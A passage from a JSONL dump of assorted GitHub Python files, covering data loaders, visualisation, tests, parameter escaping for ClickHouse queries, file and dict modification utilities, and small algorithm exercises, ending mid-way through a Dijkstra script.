train_batch_size (int, optional): batch size of training.\n Defaults to 1.\n test_batch_size (int, optional): batch size of testing.\n Defaults to 1.\n train_fraction (float, optional): fraction of data for training.\n Defaults to 0.625.\n test_fraction (float, optional): fraction of data for testing.\n Defaults to 0.125.\n num_workers (int, optional): number of workers for data loading.\n \"\"\"\n\n sum_samples = num_train_samples + num_val_samples + num_test_samples\n assert sum_samples <= 50000\n\n batch_sizes = {\n 'train': train_batch_size,\n 'val': eval_batch_size,\n 'test': eval_batch_size\n }\n\n generator = torch.Generator().manual_seed(42)\n indices = torch.randperm(sum_samples, generator=generator).tolist()\n\n splitted_indices = {\n 'train': indices[:num_train_samples],\n 'val': indices[num_train_samples:num_train_samples+num_val_samples],\n 'test': indices[num_train_samples+num_val_samples:]\n }\n\n if is_elastic:\n wavetype = 'elastic'\n if kernel_type != 'anisotropic':\n raise ValueError('Elastic kernel_type must be anisotropic')\n else:\n wavetype = 'acoustic'\n\n dataloaders = {\n x: Loader(\n f'{wavebench_dataset_path}/time_harmonic/{wavetype}/{kernel_type}_{wavetype}_{int(frequency)}.beton',\n batch_size=batch_sizes[x],\n num_workers=num_workers,\n order=OrderOption.RANDOM if x == 'train' else OrderOption.SEQUENTIAL,\n indices=splitted_indices[x],\n pipelines={\n 'input': [NDArrayDecoder(), ToTensor()],\n 'target': [NDArrayDecoder(), ToTensor()]},\n ) for x in ['train', 'val', 'test']}\n\n return dataloaders\n\n","repo_name":"wavebench/wavebench","sub_path":"wavebench/dataloaders/helmholtz_loader.py","file_name":"helmholtz_loader.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71742723047","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom human_pose_util.animation.stateful import Stateful, StatefulAnimator\nfrom glumpy.graphics.collections import SegmentCollection\n\n_side_index = {'l': 0, 'r': 1, 'c': 2}\n_n_sides = len(_side_index)\n\n\ndef joint_side(joint):\n if joint[:2] == 'l_':\n return 'l'\n elif joint[:2] == 'r_':\n return 'r'\n else:\n return 'c'\n\n\nclass LimbCollection(Stateful):\n \"\"\"Stateful objected with pose as state.\"\"\"\n\n def __init__(self, skeleton, pose, transform, viewport, linewidth=2.0):\n children = [[] for k in _side_index]\n parents = [[] for k in _side_index]\n\n for c in range(skeleton.n_joints):\n p = skeleton.parent_index(c)\n if p is not None:\n side = joint_side(skeleton.joint(c))\n index = _side_index[side]\n children[index].append(c)\n parents[index].append(p)\n self.children = children\n self.parents = parents\n\n self.body_segments = [\n SegmentCollection(mode=\"agg\",\n transform=transform,\n viewport=viewport,\n linewidth='local',\n color='local') for _ in range(3)\n ]\n\n for i, segment in enumerate(self.body_segments):\n c = children[i]\n if len(c) > 0:\n p = parents[i]\n segment.append(pose[c], pose[p], linewidth=linewidth)\n\n self.body_segments[_side_index['l']]['color'] = 0, 0, 1, 1\n self.body_segments[_side_index['r']]['color'] = 1, 0, 0, 1\n # self.body_segments[side_index['c']]['color'] = 0, 0, 0, 1\n super(LimbCollection, self).__init__(pose)\n\n def draw(self):\n for segments in self.body_segments:\n segments.draw()\n\n @property\n def pose(self):\n return self.state\n\n @pose.setter\n def pose(self, new_pose):\n self.state = new_pose\n\n def update(self, old_state, new_state):\n for i, segment in enumerate(self.body_segments):\n segment['P0'] = np.repeat(new_state[self.children[i]], 4, axis=0)\n segment['P1'] = np.repeat(new_state[self.parents[i]], 4, axis=0)\n\n\ndef limb_collection_animator(limb_collection, poses, fps):\n n_frames = len(poses) - 1\n\n def state_fn(time):\n f = time * fps % n_frames\n f0 = int(f)\n frac = f % 1\n return (1 - frac) * poses[f0] + frac * poses[f0 + 1]\n\n return StatefulAnimator(limb_collection, state_fn)\n\n\ndef skeleton_animator(skeleton, poses, fps, transform, viewport, linewidth=2.0):\n limb_collection = LimbCollection(skeleton,\n poses[0],\n transform,\n viewport,\n linewidth=linewidth)\n return limb_collection_animator(limb_collection, poses, fps)\n","repo_name":"jackd/human_pose_util","sub_path":"human_pose_util/animation/skeleton_vis.py","file_name":"skeleton_vis.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"22545547678","text":"import pandas as pd\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ndata = pd.read_csv(\"../winequality-red.csv\")\r\n\r\nhot_encoder = OneHotEncoder()\r\n\r\nhot_encoder.fit(data)\r\ndata2 = hot_encoder.transform(data)\r\nprint(data2.toarray())\r\n\r\nprint(\"Motivo: transforma estas categorias en un conjunto de columnas binarias (variables ficticias), donde cada columna representa una categoria unica.\")","repo_name":"diegojoel301/Examen-primer-parcial-INF-354","sub_path":"p4/binario.py","file_name":"binario.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2512560854","text":"import datetime\nimport unittest\nfrom unittest import mock\n\nimport singer_sdk.io_base\nimport time_machine\nfrom target_elasticsearch.sinks import template_index, build_fields\n\n\ndef test_template_index():\n dt = datetime.datetime(2017, 11, 28, 23, 55, 59, 342380)\n assert \"\" == template_index(\"\", \"\", {})\n assert \"animals-latest\" == template_index(\"animals\", \"{{ stream_name }}-latest\", {})\n assert \"animals-latest\" == template_index(\n \"animals\",\n \"{{ stream_name }}-latest\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"animals-2017\" == template_index(\n \"animals\",\n \"{{ stream_name }}-{{ to_yearly(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"animals-2017.11\" == template_index(\n \"animals\",\n \"{{ stream_name }}-{{ to_monthly(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"2017.11.28\" == template_index(\n \"animals\",\n \"{{ to_daily(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n with time_machine.travel(dt):\n assert \"2017.11.28\" == template_index(\n \"\",\n \"{{ current_timestamp_daily }}\",\n {},\n )\n assert \"2017.11\" == template_index(\n \"\",\n \"{{ current_timestamp_monthly }}\",\n {},\n )\n assert \"2017\" == template_index(\n \"\",\n \"{{ current_timestamp_yearly }}\",\n {},\n )\n\n\ndef test_build_fields():\n logger = singer_sdk.io_base.logger\n assert {} == build_fields(\"\", {}, {}, logger)\n record = {\n \"id\": 1,\n \"created_at\": \"some tz\",\n \"some_nesting\": {\"test\": \"bar\"},\n \"some_array\": [\"biz\", \"buz\"],\n }\n assert {\"timestamp\": \"some tz\"} == build_fields(\n \"animals\", {\"animals\": {\"timestamp\": \"created_at\"}}, record, logger\n )\n assert {\"hup\": \"bar\"} == build_fields(\n \"animals\", {\"animals\": {\"hup\": \"some_nesting.test\"}}, record, logger\n )\n assert {\"hup\": \"biz\"} == build_fields(\n \"animals\", {\"animals\": {\"hup\": \"some_array[0]\"}}, record, logger\n )\n\n\nclass SinkTests(unittest.TestCase):\n @mock.patch(\"target_elasticsearch.sinks.ElasticSink\")\n def test_config(self, mock_es):\n pass\n","repo_name":"dtmirizzi/target-elasticsearch","sub_path":"tests/unit/test_target.py","file_name":"test_target.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"7964512970","text":"import nose\nimport support\nimport support.tools\nfrom pika.adapters import SelectConnection\n\n\nclass TestAsyncSendGet(support.tools.AsyncPattern):\n\n @nose.tools.timed(2)\n def test_send_and_get(self):\n self.confirmed = False\n self.connection = self._connect(SelectConnection, support.PARAMETERS)\n self.connection.ioloop.start()\n if not self.confirmed:\n assert False, 'Messages did not match.'\n pass\n\n def _on_channel(self, channel):\n self.channel = channel\n self._queue_declare()\n\n def _on_queue_declared(self, frame):\n test_message = self._send_message()\n\n def check_message(channel_number, method, header, body):\n self.confirmed = (body == test_message)\n self.connection.add_on_close_callback(self._on_closed)\n self.connection.close()\n\n self.channel.basic_get(callback=check_message, queue=self._queue)\n","repo_name":"inean/pika","sub_path":"tests/functional/send_get_test.py","file_name":"send_get_test.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30993949978","text":"import numpy as np\nfrom sympy import Abs, symbols, S, Max, Min, solve\nfrom sympy.abc import x, y\n\nINPUT_FROM_USER = False\n\n#-------------------\n#BOTTLENECK DISTANCE\n#-------------------\n\n#Numpy Bottleneck (no symbolic calculus)\ndef bottleneck(p,q):\n #p, q points the upper diagonal half-plane of R^2\n max1 = np.max([np.abs(p[0]-q[0]),np.abs(p[1]-q[1])])\n max2 = np.max([(p[1]-p[0])/2, (q[1]-q[0])/2])\n return np.min([max1,max2])\n\n#Sympy Bottleneck (with symbolic calculus)\ndef symBottleneck(u,v):\n #u, v points the upper diagonal half-plane of R^2\n p0,p1,q0,q1 = symbols(\"p0,p1,q0,q1\")\n m1 = Max(Abs(p0-q0), Abs(p1-q1))\n m2 = Max((p1-p0)/2, (q1-q0)/2)\n return Min(m1,m2).subs({p0:u[0],p1:u[1],q0:v[0],q1:v[1]})\n\n#----------------\n#POSITION THEOREM\n#----------------\n\n#Intersection between filtering line and contour\ndef intersImproper(va,f):\n #Intersects r_{(a,b)} with contour of equation f\n b = symbols(\"b\")\n equations = [f, (1-va)*x - va*y - b]\n return solve(equations, x, y, dict=True)\n\ndef main():\n \"\"\" Main program \"\"\"\n if INPUT_FROM_USER:\n notvalid = True\n while notvalid:\n p0,p1 = input(\"Enter point p coordinates:\").split()\n if p0 > p1:\n print(\"The point p does not belong to the upper half-plane. Choose another point.\")\n else: \n notvalid = False\n notvalid = True\n while notvalid:\n q0,q1 = input(\"Enter point q coordinates:\").split()\n if q0 > q1:\n print(\"The point q does not belong to the upper half-plane. Choose another point.\")\n else: \n notvalid = False\n p = [int(p0),int(p1)]\n q = [int(q0),int(q1)]\n\n print(bottleneck(p,q))\n\n bot = symBottleneck([0,1],[0,2])\n print(bot)\n\n x1,x2,x3,x4,x5,b = symbols(\"x1,x2,x3,x4,x5,b\")\n f = x**2 + y**2 - x5**2\n print(intersImproper(1/2,f))\n\nif __name__ == \"__main__\":\n main()","repo_name":"emosig/Bottleneck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73439200807","text":"#Se em algum momento ela assumir a posição -1 ou a posição N, ela cairá do tronco! \n\n#P e dá um passo para a direita, ela assumirá a posição P+1\n#Se o passo for para a esquerda, ela assumirá a posição P-1.\n#Se em algum momento ela assumir a posição -1 ou a posição N, ela cairá do tronco! Um passo leva um segundo para ser completado, \n#e a formiga sempre está se movendo.\n\n#Considerando que a formiga fará sempre a pior sequência \n#de passos possível, escolha uma posição inicial de \n#modo que maximize o tempo em que a formiga permaneça \n#no tronco. Imprima este tempo.\n\n#Para cada caso, imprima o tempo máximo que a \n#formiguinha pode ficar no tronco.\n\nt = int(input())\n\ncount1 = 0\ncount2 = 0\n\nfor i in range(0, t):\n d = int(input())\n d1 = d//2\n d2 = d//2\n while d1 > 0:\n d1 -= 1\n count1 += 1\n while d2 < d:\n d2 += 1\n count2 += 1\n \n if d1 < d2:\n print(count1)\n else:\n print(count2)","repo_name":"gabrielreiss/URI","sub_path":"1612.py","file_name":"1612.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30708172413","text":"# 读取配置信息\nimport configparser\nimport os\nproDir = os.path.split(os.path.realpath(__file__))[0]\nconfigPath = os.path.join(proDir, \"config.ini\")\n\nclass ReadConfig:\n def __init__(self):\n self.cf = configparser.ConfigParser()\n self.cf.read(configPath)\n\n def get_http(self, param):\n value = self.cf.get(\"http\", param)\n return value\n\n def get_db(self, param):\n value = self.cf.get(\"database\", param)\n return value\n\nif __name__ == '__main__':\n test = ReadConfig()\n # LocalIp = test.get_http('baseurl')\n LocalIp = test.get_db('ip')\n print(LocalIp)","repo_name":"jeremyli007/AutoTest","sub_path":"UiTest/readconfig.py","file_name":"readconfig.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8215705171","text":"def quickselect(ar, levy, pravy, K):\n\tif levy == pravy:\n\t\treturn ar[levy]\n\tnahodnyIndex = random.randint(levy, pravy)\n\tpivotIndex = rozdelit(ar, levy, pravy, nahodnyIndex)\n\tif pivotIndex == K:\n\t\treturn ar[pivotIndex]\n\tif pivotIndex < K:\n\t\treturn quickselect(ar, pivotIndex + 1, pravy, K)\n\telse:\n\t\treturn quickselect(ar, levy, pivotIndex - 1, K)\n","repo_name":"burtgulash/fav2011-pro","sub_path":"median/fragments/quickselect_recur.py","file_name":"quickselect_recur.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31383475430","text":"import email_handling as eh\nimport string\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport clean_text as ct\nimport collections\nimport numpy as np\nimport math\nimport pickle\n\n# 将序列化对象存储在pickle文件中\ndef write_pkl(outputfile, item):\n of = open(outputfile, 'wb')\n pickle.dump(item, of)\n of.close()\n print(\"finish writing in %s !\" % outputfile)\n\n# 把内含元组的列表转换成二维列表\ndef tuple_to_list(_list): \n for unit in _list:\n _list[_list.index(unit)] = list(unit)\n return _list\n\n# 对邮件作者构建倒排索引,输入索引加文件名的二维列表\ndef create_author_InvertedIndex(index_file_list, header):\n file_set = index_file_list\n inverted_index = []\n for i in range(0, len(file_set)):\n cleaned = eh.extract_header(eh.read_email(file_set[i][1]), header)\n statistics = collections.Counter(cleaned).most_common() # 统计词频\n sub_list = tuple_to_list(statistics)\n for j in range(0, len(sub_list)): # 向所有词后添加文件索引\n sub_list[j].append(file_set[i][0])\n if len(inverted_index) == 0:\n inverted_index += sub_list\n else:\n combine_list(inverted_index, sub_list)\n dict_sort = sort_as_dict(inverted_index)\n return re_comb(dict_sort, len(file_set))\n\n# 对邮件标题构建倒排索引,输���索引加文件名的二维列表\ndef create_subject_InvertedIndex(index_file_list, header):\n file_set = index_file_list\n inverted_index = []\n for i in range(0, len(file_set)):\n cleaned = get_cleaned_subject(file_set[i][1], header)\n if len(cleaned) != 0:\n statistics = collections.Counter(cleaned).most_common() # 统计词频\n sub_list = tuple_to_list(statistics)\n for j in range(0, len(sub_list)): # 向所有词后添加文件索引\n sub_list[j].append(file_set[i][0])\n if len(inverted_index) == 0:\n inverted_index += sub_list\n else:\n combine_list(inverted_index, sub_list)\n dict_sort = sort_as_dict(inverted_index)\n return re_comb(dict_sort, len(file_set))\n\n# 对邮件内容构建倒排索引,输入索引加文件名的二维列表\ndef create_body_InvertedIndex(index_file_list):\n file_set = index_file_list\n inverted_index = []\n for i in range(0, len(file_set)):\n cleaned = get_cleaned_body(file_set[i][1])\n statistics = collections.Counter(cleaned).most_common() # 统计词频\n sub_list = tuple_to_list(statistics)\n for j in range(0, len(sub_list)): # 向所有词后添加文件索引\n sub_list[j].append(file_set[i][0])\n if len(inverted_index) == 0:\n inverted_index += sub_list\n else:\n combine_list(inverted_index, sub_list)\n dict_sort = sort_as_dict(inverted_index)\n return re_comb(dict_sort, len(file_set))\n\n# 输入两个二维列表\ndef combine_list(list_1, list_2): \n word_1 = [item[0] for item in list_1]\n word_2 = [item[0] for item in list_2]\n for i in range(0, len(word_2)):\n if word_2[i] in word_1:\n _index = word_1.index(word_2[i])\n #list_1[_index][1] += list_2[i][1]\n list_1[_index].append(list_2[i][1])\n list_1[_index].append(list_2[i][2])\n else:\n w = np.array(list_2[i]).reshape(1, -1).tolist()\n w[0][1] = int(w[0][1])\n w[0][2] = int(w[0][2])\n list_1 += w\n return list_1\n\n# 输入构建好的单词加索引的二维列表\ndef sort_as_dict(_list): \n l = [item[0] for item in _list]\n word = sorted(l)\n dict = []\n for i in range(0, len(word)):\n if word[i] in l:\n dict.append(_list[l.index(word[i])])\n return dict\n\ndef get_cleaned_subject(tarpath, header):\n email = eh.read_email(tarpath)\n subject = eh.extract_header(email, header)\n if len(subject) != 0:\n cleaned = ct.clean_text(subject[0])\n return cleaned\n if len(subject) == 0:\n return []\n\ndef get_cleaned_body(tarpath):\n email = eh.read_email(tarpath)\n body = eh.extract_body(email)\n cleaned = ct.clean_text(body)\n return cleaned\n\n# tf_td:t在文档d中出现的次数\n# df_t:出现t的文档数目\n# 计算词的tf-idf权重\n\ndef re_comb(_list, sum_files):\n word = np.array([item[0] for item in _list]).reshape(-1,1).tolist()\n tf_td = [[-1 for col in range(1)] for raw in range(len(word))]\n files = [[-1 for col in range(1)] for raw in range(len(word))]\n for i in range(0, len(_list)):\n for j in range(0, int((len(_list[i])-1)/2)):\n if tf_td[i][0] == -1 or files[i][0] == -1:\n tf_td[i][0] = _list[i][2*j+1]\n files[i][0] = _list[i][2*j+2]\n else:\n tf_td[i].append(_list[i][2*j+1])\n files[i].append(_list[i][2*j+2])\n _sum = sum(tf_td[i])\n _len = len(files[i])\n tf_td[i].append(_sum)\n files[i].append(_len)\n word_sum = np.array([item.pop() for item in tf_td]).reshape(-1,1).tolist()\n doc_sum = np.array([item.pop() for item in files]).reshape(-1,1).tolist()\n N = sum_files\n for i in range(0, len(tf_td)):\n word[i].append(doc_sum[i][0])\n word[i].append(word_sum[i][0])\n for j in range(0, len(tf_td[i])):\n tf_td[i][j] = (1 + math.log10(tf_td[i][j])) * math.log10(N / doc_sum[i][0])\n word[i].append(files[i][j])\n for j in range(0, len(tf_td[i])):\n word[i].append(tf_td[i][j])\n return word\n\n'''\n对于倒排索引二维列表的每一行而言,每个数据依次表示的含义是:\n文档中的词--该词出现文档总数--该词在所有文档中出现的总次数--|文档索引|--|tf_idf权重|\n'''\n\n","repo_name":"InftyMing/IR-Vector-Space-Model","sub_path":"code/create_InvertedIndex.py","file_name":"create_InvertedIndex.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2366278609","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, division, print_function\nimport os\nimport shutil\n\n\"\"\"\nThis module defines various classes of supported actions. All actions are\nimplemented as static methods, but are defined using classes (as opposed to\nmodules) so that a set of well-defined actions can be namespaced easily.\n\"\"\"\n\n__author__ = \"Shyue Ping Ong\"\n__copyright__ = \"Copyright 2012, The Materials Project\"\n__version__ = \"0.1\"\n__maintainer__ = \"Shyue Ping Ong\"\n__email__ = \"ongsp@ucsd.edu\"\n__date__ = \"Jun 2, 2012\"\n\n\ndef get_nested_dict(input_dict, key):\n current = input_dict\n toks = key.split(\"->\")\n n = len(toks)\n for i, tok in enumerate(toks):\n if tok not in current and i < n - 1:\n current[tok] = {}\n elif i == n - 1:\n return current, toks[-1]\n current = current[tok]\n\n\nclass DictActions(object):\n \"\"\"\n Class to implement the supported mongo-like modifications on a dict.\n Supported keywords include the following Mongo-based keywords, with the\n usual meanings (refer to Mongo documentation for information):\n\n _inc\n _set\n _unset\n _push\n _push_all\n _add_to_set (but _each is not supported)\n _pop\n _pull\n _pull_all\n _rename\n\n However, note that \"_set\" does not support modification of nested dicts\n using the mongo {\"a.b\":1} notation. This is because mongo does not allow\n keys with \".\" to be inserted. Instead, nested dict modification is\n supported using a special \"->\" keyword, e.g. {\"a->b\": 1}\n \"\"\"\n\n @staticmethod\n def set(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n d[key] = v\n\n @staticmethod\n def unset(input_dict, settings):\n for k in settings.keys():\n (d, key) = get_nested_dict(input_dict, k)\n del d[key]\n\n @staticmethod\n def push(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key].append(v)\n else:\n d[key] = [v]\n\n @staticmethod\n def push_all(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key].extend(v)\n else:\n d[key] = v\n\n @staticmethod\n def inc(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d:\n d[key] += v\n else:\n d[key] = v\n\n @staticmethod\n def rename(input_dict, settings):\n for k, v in settings.items():\n if k in input_dict:\n input_dict[v] = input_dict[k]\n del input_dict[k]\n\n @staticmethod\n def add_to_set(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if key in d and v not in d[key]:\n d[key].append(v)\n elif key not in d:\n d[key] = v\n\n @staticmethod\n def pull(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if key in d:\n d[key] = [i for i in d[key] if i != v]\n\n @staticmethod\n def pull_all(input_dict, settings):\n for k, v in settings.items():\n if k in input_dict and (not isinstance(input_dict[k], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n for i in v:\n DictActions.pull(input_dict, {k: i})\n\n @staticmethod\n def pop(input_dict, settings):\n for k, v in settings.items():\n (d, key) = get_nested_dict(input_dict, k)\n if key in d and (not isinstance(d[key], list)):\n raise ValueError(\"Keyword {} does not refer to an array.\"\n .format(k))\n if v == 1:\n d[key].pop()\n elif v == -1:\n d[key].pop(0)\n\n\nclass FileActions(object):\n \"\"\"\n Class of supported file actions. For FileActions, the modder class takes in\n a filename as a string. The filename should preferably be a full path to\n avoid ambiguity.\n \"\"\"\n\n @staticmethod\n def file_create(filename, settings):\n \"\"\"\n Creates a file.\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"content\": actual_content}\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'content'.\")\n for k, v in settings.items():\n if k == \"content\":\n with open(filename, 'w') as f:\n f.write(v)\n\n @staticmethod\n def file_move(filename, settings):\n \"\"\"\n Moves a file. {'_file_move': {'dest': 'new_file_name'}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"dest\": path of new file}\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'dest'.\")\n for k, v in settings.items():\n if k == \"dest\":\n shutil.move(filename, v)\n\n @staticmethod\n def file_delete(filename, settings):\n \"\"\"\n Deletes a file. {'_file_delete': {'mode': \"actual\"}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"mode\": actual/simulated}. Simulated\n mode only prints the action without performing it.\n \"\"\"\n if len(settings) != 1:\n raise ValueError(\"Settings must only contain one item with key \"\n \"'mode'.\")\n for k, v in settings.items():\n if k == \"mode\" and v == \"actual\":\n try:\n os.remove(filename)\n except OSError:\n #Skip file not found error.\n pass\n elif k == \"mode\" and v == \"simulated\":\n print(\"Simulated removal of {}\".format(filename))\n\n @staticmethod\n def file_copy(filename, settings):\n \"\"\"\n Copies a file. {'_file_copy': {'dest': 'new_file_name'}}\n\n Args:\n filename (str): Filename.\n settings (dict): Must be {\"dest\": path of new file}\n \"\"\"\n for k, v in settings.items():\n if k.startswith(\"dest\"):\n shutil.copyfile(filename, v)\n\n @staticmethod\n def file_modify(filename, settings):\n \"\"\"\n Modifies file access\n\n Args:\n filename (str): Filename.\n settings (dict): Can be \"mode\" or \"owners\"\n \"\"\"\n for k, v in settings.items():\n if k == \"mode\":\n os.chmod(filename,v)\n if k == \"owners\":\n os.chown(filename,v)\n","repo_name":"xiaowei-xie/custodian","sub_path":"custodian/ansible/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"39510468459","text":"# Methods used for rendering a ClickHouse query, given a template string and a\n# set of parameters.\n#\n# This uses the `escape_param` function from the `clickhouse-driver` package,\n# but passes an empty `Context` object to it. Prior to\n# https://github.com/mymarilyn/clickhouse-driver/commit/87090902f0270ed51a0b6754d5cbf0dc8544ec4b\n# the `escape_param` function didn't take a `Context` object. As of\n# `clickhouse-driver` 0.2.4 all it uses the context for is to determine the\n# \"server\" timezone, so passing an empty context maintains the existing\n# behaviour of `clickhouse-driver` 0.2.1, the version we were previously using.\n#\n# This is of course a bit of a hack but we want to be able to render queries\n# without the need of having a connection, which seems like a reasonable thing\n# to be able to do. Having a dependency on a connection to render a query is a\n# little over the top.\n#\n# NOTE: this change is necessary because the `clickhouse-driver` package up to\n# 0.2.3 uses an invalid `python_requires` in it's `setup.py` at least for\n# recent versions of setuptools. This was highlighted as a consequence of\n# upgrading to Python 3.10. See\n# https://github.com/mymarilyn/clickhouse-driver/pull/291 for further context.\n\n\nfrom typing import Any\n\nfrom clickhouse_driver.connection import ServerInfo\nfrom clickhouse_driver.context import Context\nfrom clickhouse_driver.util.escape import escape_param\n\n\ndef substitute_params(query, params):\n \"\"\"\n This is a copy of clickhouse-driver's `substitute_params` function without\n the dependency that you need to connect to the server before you can escape\n params. There was a bug in which we were trying to substitute params before\n the connection was established, which caused the query to fail. Presumably\n this was on initial worker startup only.\n\n It seems somewhat unusual that you need to connect to the server before\n you can escape params, so we're just going to copy the function here\n and remove that dependency.\n\n See\n https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/client.py#L593\n for the original function.\n \"\"\"\n if not isinstance(params, dict):\n raise ValueError(\"Parameters are expected in dict form\")\n\n escaped = escape_params(params)\n return query % escaped\n\n\ndef escape_params(params):\n \"\"\"\n This is a copy of clickhouse-driver's `escape_params` function without the\n dependency that you need to connect to the server before you can escape\n params.\n\n See\n https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/util/escape.py#L60\n for the original function.\n \"\"\"\n escaped = {}\n\n for key, value in params.items():\n escaped[key] = escape_param_for_clickhouse(value)\n\n return escaped\n\n\ndef escape_param_for_clickhouse(param: Any) -> str:\n \"\"\"\n This is a wrapper around the `escape_param` function from the\n `clickhouse-driver` package, but passes a placeholder `Context` object to it\n just such that it can run. The only value that the real `escape_param` uses\n from the context is the server timezone. We assume that the server timezone\n is UTC.\n\n See\n https://github.com/mymarilyn/clickhouse-driver/blob/87090902f0270ed51a0b6754d5cbf0dc8544ec4b/clickhouse_driver/util/escape.py#L31\n for the wrapped function.\n \"\"\"\n context = Context()\n context.server_info = ServerInfo(\n name=\"placeholder server_info value\",\n version_major=\"placeholder server_info value\",\n version_minor=\"placeholder server_info value\",\n version_patch=\"placeholder server_info value\",\n revision=\"placeholder server_info value\",\n display_name=\"placeholder server_info value\",\n timezone=\"UTC\",\n )\n return escape_param(param, context=context)\n","repo_name":"PostHog/posthog","sub_path":"posthog/clickhouse/client/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"36363028644","text":"\"\"\"\nSegún cierta cultura oriental, los números de la suerte son el 3, el 7, el 8 y el 9. Los números de la mala suerte son\nel resto: el 0, el 1, el 2, el 4, el 5 y el 6.\n\nUn número es afortunado si contiene más números de la suerte que de la mala suerte.\n\nRealiza un programa que diga si un número introducido por el usuario es afortunado o no.\n\nEjemplo 1:\tIntroduzca un número: 772\nEl 772 es un número afortunado.\n\nEjemplo 2:\tIntroduzca un número: 7720\nEl 7720 no es un número afortunado.\n\nEjemplo 3:\tIntroduzca un número: 43081\nEl 43081 no es un número afortunado.\n\nEjemplo 4:\tIntroduzca un número: 888\nEl 888 es un número afortunado.\n\nEjemplo 5:\tIntroduzca un número: 1234\nEl 1234 no es un número afortunado.\n\nEjemplo 6:\tIntroduzca un número: 6789\nEl 6789 es un número afortunado.\n\"\"\"\nimport sys\n\nprint(\"Test de número afortunado\")\nprint(\"-------------------------\")\n\nLUCKY_NUMBERS = \"3789\"\n\nnumber = input(\"Introduzca un número: \")\nif not number.isdigit():\n print(\"ERROR. No ha introducido un número.\", file=sys.stderr)\n\n# Contamos la cantidad de dígitos de la suerte\nnum_lucky_numbers = 0\nfor digit in number:\n if digit in LUCKY_NUMBERS:\n num_lucky_numbers += 1\n\n# Si la cantidad de dígitos de la suerte es mayor que la mitad del total de dígitos, el número es afortunado\nif num_lucky_numbers > len(number) // 2:\n print(f\"El {number} es un número afortunado.\")\nelse:\n print(f\"El {number} no es un número afortunado.\")","repo_name":"rdelcastillo/DAW-Python","sub_path":"examenes/curso2223trim1-1/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20059412087","text":"# -----------------------------------------------------------\n#Example of dijkstra algorithm implementation\n#(C) 2021 Paweł Goj, PL\n# Released under MIT license\n# -----------------------------------------------------------\n\n\nfrom collections import deque #list-like container with fast appends and pops on either end\nimport json\n\n#load a file with the graph\nwith open('Weighted_graph.json', 'r') as file:\n file = file.read()\n\ngraph = json.loads(file)\n\n\n#function creates tuple of dictionary with costs and parents \ndef create_costs_and_parents(graph: dict, start_node: str) -> tuple:\n infinity = float(\"inf\")\n costs = {}\n parents = {}\n check_list = []\n try:\n children = graph[start_node]\n check_list.append(start_node)\n except:\n return {}, {}\n\n if children == 0:\n return {}, {}\n\n else:\n queue = deque([])\n for key, value in children.items():\n 